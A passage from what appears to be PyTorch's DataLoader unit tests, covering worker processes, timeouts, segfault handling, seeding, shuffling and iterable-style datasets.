# If all workers will call `sync_once`, they will be blocked until all workers
# reach the call (i.e., acting like a barrier).
# This can be used to ensure that each worker at least processes one data.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See
# test_large_sampler_indices
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
next = __next__ # py2 compatibility
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthander_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def _test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=_test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# _test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
class CustomList(list):
pass
class CustomDict(dict):
pass
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader cleanly exit when the process errors
# 1. having an reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't configured for each worker, so for
# the equality test below to be valid, we cannot have more than 1 workers.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batches
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# windows and jetson devices don't support sharing cuda tensor; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS and not IS_JETSON:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_seqential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_seqential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement and without specified num_samples
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
